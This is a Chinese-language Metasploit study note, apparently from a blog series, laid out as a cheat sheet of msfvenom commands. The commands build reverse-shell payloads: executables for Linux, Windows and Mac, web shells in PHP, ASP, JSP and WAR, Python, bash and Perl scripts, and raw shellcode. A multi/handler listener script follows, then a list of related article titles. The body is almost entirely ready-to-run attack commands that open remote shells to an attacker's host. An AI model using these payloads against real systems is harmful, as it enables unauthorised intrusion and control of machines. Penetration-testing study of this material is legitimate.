Metasploit滲透測試學習筆記——7、使用Metasploit生成各種payload
前言
在metasploit中,往往一個最有用的(初學者低估)功能模組是Metasploit的msfpayload模組。這個模組可以建立多個有效載荷,它可以幫助在任何情況下給你一個shell。對於每一個這些有效載荷可以進入msfconsole選擇合理的利用,執行“設定有效載荷的必要選項(LHOST,LPORT,等),執行並等待要執行的有效負載。下面我們開始今天的介紹吧,我覺得每一個喜歡metasploit的人都應該儲存這篇文章。
列出所有的payload
msfvenom -l
編譯的可執行程式
linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
下面是shellcode生成的各種方法,針對了不同的平臺
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Msfvenom可以將輸出的程式碼是能夠被切割和貼上在對應的程式語言中直接使用,下面是設定的指令碼
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
使用上面的指令碼,我們可以很簡單的開始使用metasploit了。
相關文章
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- metasploit 滲透測試筆記(基礎篇)筆記
- Metasploit滲透測試指南
- metasploit 滲透測試筆記(meterpreter篇)筆記
- 9、Metasploit域滲透測試全程實錄
- Metasploit學習筆記筆記
- 《Metasploit滲透測試手冊》—第3章3.3節在WindowsXPSP2上進行滲透測試8.7使用Metasploit進行模糊測試Windows
- Metasploit簡單使用——後滲透階段
- 內網滲透 Metasploit(MSF)基礎使用內網
- Kail Linux滲透測試教程之在Metasploit中掃描AILinux
- 滲透測試學習記錄
- 記學習滲透測試之列舉
- 記學習滲透測試之情報收集
- 記學習滲透測試之掃描埠
- Metasploit Pro 4.22.3-2024041701 (Linux, Windows) - 專業滲透測試框架LinuxWindows框架
- 記學習滲透測試之報告測試引數一
- 記學習滲透測試之報告測試引數二
- 記學習滲透測試之報告測試引數四
- 記學習滲透測試之報告測試引數三
- Metasploit之後滲透攻擊(資訊收集、許可權提升)
- 記學習滲透測試之漏洞掃描一
- 記學習滲透測試之漏洞掃描二
- 記學習滲透測試之破解密碼一解密密碼
- 記學習滲透測試之破解密碼二解密密碼
- Metasploit Pro 4.22.2-2024071501 (Linux, Windows) - 專業滲透測試框架LinuxWindows框架
- 記學習滲透測試之漏洞掃描簡述
- Metasploit 滲透測試手冊第三版 第二章 資訊收集與掃描(翻譯)
- Metasploit Pro 4.22.2-2024061001 (Linux, Windows) - 專業滲透測試框架LinuxWindows框架
- Metasploit Pro 4.22.3-2024082201 (Linux, Windows) - 專業滲透測試框架LinuxWindows框架
- 使用Metasploit工作區
- 如何學習網站漏洞滲透測試學習網站
- 滲透測試是否需要學習LinuxLinux
- 記學習滲透測試之識別作業系統作業系統
- Metasploit 滲透測試手冊第三版 第二章 資訊收集與掃描 -續(翻譯)
- 滲透測試學習之報告測試引數五
- 【滲透測試筆記】之【MSF 弱點掃描】筆記
- Metasploit irb命令使用技巧
- Metasploit search命令使用技巧